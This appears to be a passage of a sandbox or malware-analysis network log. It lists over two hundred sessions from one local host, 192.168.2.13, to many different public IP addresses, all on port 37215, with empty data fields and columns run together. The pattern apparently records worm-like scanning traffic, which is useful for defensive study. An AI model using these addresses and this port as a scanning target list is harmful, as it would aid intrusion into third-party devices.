                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5526192.168.2.135943041.133.252.15737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5527192.168.2.134669441.206.170.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5528192.168.2.134202641.20.220.23837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5529192.168.2.1342712197.161.147.7637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5530192.168.2.135341641.89.85.10037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5531192.168.2.1356158157.44.129.15537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5532192.168.2.133842041.243.123.16737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5533192.168.2.135725241.187.89.18337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5534192.168.2.134611823.252.13.21037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5535192.168.2.1360840197.127.215.20337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5536192.168.2.1341424107.79.44.20437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5537192.168.2.1345460157.27.136.22237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5538192.168.2.1334126157.12.214.1337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5539192.168.2.1340098197.169.133.3637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5540192.168.2.1349442197.85.98.20037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5541192.168.2.1358066157.223.81.5037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5542192.168.2.1359334150.69.255.20037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5543192.168.2.1353374197.72.108.22337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5544192.168.2.1353318157.113.196.20037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5545192.168.2.135505841.58.115.5437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5546192.168.2.134598641.224.53.8437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5547192.168.2.1351848157.35.141.19237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5548192.168.2.1359418157.195.211.7737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5549192.168.2.1334420157.230.9.15037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5550192.168.2.1354618157.144.192.11337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5551192.168.2.1359706197.249.113.13237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5552192.168.2.135647041.227.60.6537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5553192.168.2.1347218157.22.99.19637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5554192.168.2.1340354197.30.53.18837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5555192.168.2.1334636197.42.108.17837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5556192.168.2.1340052157.189.224.23037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5557192.168.2.135036837.31.9.5837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5558192.168.2.1339898197.64.118.16537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5559192.168.2.1350942157.148.33.10237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5560192.168.2.133296069.246.79.22737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5561192.168.2.1356226197.118.202.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5562192.168.2.1350080157.186.164.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5563192.168.2.1360532155.155.230.24737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5564192.168.2.1355614197.31.36.15237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5565192.168.2.1355648197.162.2.17637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5566192.168.2.1339622188.182.111.13637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5567192.168.2.1346270162.79.182.20237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5568192.168.2.134976841.111.20.9437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5569192.168.2.133421241.127.237.10137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5570192.168.2.1352782197.171.129.18937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5571192.168.2.1358778197.187.218.12737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5572192.168.2.134302241.51.85.7737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5573192.168.2.134813041.199.109.17637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5574192.168.2.134646441.245.82.4037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5575192.168.2.1340468157.74.185.16637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5576192.168.2.1332784157.204.5.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5577192.168.2.135804841.184.253.5437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5578192.168.2.133727841.172.89.637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5579192.168.2.1345442157.177.243.7037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5580192.168.2.1353496197.62.163.6837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5581192.168.2.135444441.74.84.14637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5582192.168.2.133363241.62.11.5437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5583192.168.2.1358994197.159.11.19637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5584192.168.2.134872241.28.25.20637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5585192.168.2.133674841.170.153.21637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5586192.168.2.1358846157.226.238.7237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5587192.168.2.1340316157.206.19.737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5588192.168.2.135233241.237.124.17337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5589192.168.2.1349580157.177.247.9137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5590192.168.2.135168635.72.116.23237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5591192.168.2.135834041.122.87.13137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5592192.168.2.1348206157.160.165.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5593192.168.2.135289441.194.179.23837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5594192.168.2.135140625.131.226.9637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5595192.168.2.1360276197.71.39.337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5596192.168.2.1357968157.95.30.20537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5597192.168.2.135692041.244.36.7137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5598192.168.2.1334418157.53.43.16537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5599192.168.2.1359210197.253.130.17137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5600192.168.2.135772441.40.240.13537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5601192.168.2.134165641.62.34.12037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5602192.168.2.1355596157.192.69.14137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5603192.168.2.1349610121.220.176.19837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5604192.168.2.1346432197.227.99.15237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5605192.168.2.1342468157.218.145.5837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5606192.168.2.1344734192.83.244.837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5607192.168.2.1346110157.28.223.6037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5608192.168.2.133919041.58.0.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5609192.168.2.1348806197.200.95.22137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5610192.168.2.1352158157.53.189.13037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5611192.168.2.135732441.36.25.19137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5612192.168.2.134240641.206.174.16337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5613192.168.2.1343188220.33.167.9937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5614192.168.2.1338198197.17.242.21237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5615192.168.2.1356206194.25.234.2337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5616192.168.2.1344626116.157.119.14237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5617192.168.2.1344372197.221.102.20637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5618192.168.2.1334424197.113.77.20137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5619192.168.2.1333764157.67.253.17537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5620192.168.2.1348928157.50.206.3737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5621192.168.2.1342294197.151.151.7437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5622192.168.2.135033237.58.57.17937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5623192.168.2.1334860197.75.226.6437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5624192.168.2.1333710197.158.174.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5625192.168.2.1335962157.225.215.22837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5626192.168.2.1339138157.230.19.7537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5627192.168.2.134480232.55.158.25537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5628192.168.2.1352072155.191.42.14637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5629192.168.2.1355370157.59.139.17837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5630192.168.2.134193441.241.239.7637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5631192.168.2.135592867.170.192.7437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5632192.168.2.1359268180.203.143.22137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5633192.168.2.133389441.193.134.15037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5634192.168.2.134086032.180.254.11237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5635192.168.2.1335076197.243.2.17837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5636192.168.2.1352702157.204.168.15037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5637192.168.2.134270841.159.237.10737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5638192.168.2.1338870157.109.75.13537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5639192.168.2.1354386205.102.222.2837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5640192.168.2.1333076197.111.34.18837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5641192.168.2.1356588157.78.189.14437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5642192.168.2.1336588197.217.6.20937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5643192.168.2.1355840197.217.181.4437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5644192.168.2.1333766157.82.222.7037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5645192.168.2.1336776197.31.125.24537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5646192.168.2.1354504123.64.216.20737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5647192.168.2.1344408157.160.49.1037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5648192.168.2.1359744157.200.42.3937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5649192.168.2.1348716157.209.188.2637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5650192.168.2.1353870157.94.237.18937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5651192.168.2.1351140138.105.2.8837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5652192.168.2.134694054.195.200.2137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5653192.168.2.1346242213.224.89.7737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5654192.168.2.1357710197.76.186.9837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5655192.168.2.1353686178.29.146.3437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5656192.168.2.134591423.67.158.6637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5657192.168.2.133475441.4.106.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5658192.168.2.1341890157.128.32.5837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5659192.168.2.1338628157.155.81.14237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5660192.168.2.1345502197.61.122.17937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5661192.168.2.1350592157.244.134.20637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5662192.168.2.134095641.10.115.15237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5663192.168.2.1351776157.215.94.737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5664192.168.2.1334822197.18.51.25137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5665192.168.2.135206441.181.68.5137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5666192.168.2.1347886157.241.176.18837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5667192.168.2.133553492.84.87.13637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5668192.168.2.1349138157.238.239.5137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5669192.168.2.1349738197.119.154.16437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5670192.168.2.1348984107.230.78.3037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5671192.168.2.1351480197.149.185.12537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5672192.168.2.1338502190.95.5.4837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5673192.168.2.1358526197.204.32.24537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5674192.168.2.135208041.205.117.10737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5675192.168.2.1359104217.6.210.12737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5676192.168.2.1346148197.19.235.17137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5677192.168.2.1343886157.177.119.11337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5678192.168.2.1340712157.215.162.11737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5679192.168.2.135913441.10.163.10637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5680192.168.2.1353284118.203.155.7237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5681192.168.2.1348420157.150.223.23537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5682192.168.2.135485241.123.253.20837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5683192.168.2.1346338145.46.249.21537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5684192.168.2.135346279.138.167.13237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5685192.168.2.1359428148.44.79.24037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5686192.168.2.1344620197.234.129.5137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5687192.168.2.133886841.107.180.9737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5688192.168.2.135878237.94.47.1937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5689192.168.2.134433041.120.25.7537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5690192.168.2.134802043.169.155.2937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5691192.168.2.1349272197.48.140.16437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5692192.168.2.13571945.203.249.19937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5693192.168.2.134154841.69.32.17437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5694192.168.2.1346782197.110.25.21437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5695192.168.2.1333174197.92.122.21137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5696192.168.2.1340368157.174.111.9537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5697192.168.2.1345794157.118.52.13437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5698192.168.2.1349632197.109.61.437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5699192.168.2.1359250157.2.224.15037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5700192.168.2.1339114101.2.108.2937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5701192.168.2.1336980197.48.116.23137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5702192.168.2.135749041.91.171.17037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5703192.168.2.1342902197.169.194.3037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5704192.168.2.1336496197.35.171.23937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5705192.168.2.134078441.231.72.13037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5706192.168.2.1359786197.149.153.11537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5707192.168.2.134913641.72.45.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5708192.168.2.1360556197.54.7.9937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5709192.168.2.1344514156.68.17.4637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5710192.168.2.1349516222.177.116.22537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5711192.168.2.1333780200.104.83.24137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5712192.168.2.1334468197.184.114.21937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5713192.168.2.1358608197.173.211.17237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5714192.168.2.1343530157.142.191.8337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5715192.168.2.134167241.109.245.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5716192.168.2.1352138157.236.154.11137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5717192.168.2.135031641.204.186.537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5718192.168.2.1353278129.166.216.14837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5719192.168.2.1335128157.231.191.3537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5720192.168.2.1349220157.141.41.11337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5721192.168.2.1354572197.86.133.1437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5722192.168.2.1333758197.108.21.9337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5723192.168.2.135197212.217.235.21237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5724192.168.2.1340652145.141.141.337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5725192.168.2.1333668157.131.164.137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5726192.168.2.133710241.196.109.12937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5727192.168.2.1343756157.139.6.8437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5728192.168.2.1336620197.242.231.10537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5729192.168.2.1346874157.146.32.10537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5730192.168.2.1333326157.186.61.937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5731192.168.2.1355070168.237.220.4837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5732192.168.2.1350754210.3.112.22937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5733192.168.2.134472019.33.19.23137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5734192.168.2.133531232.59.113.13237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
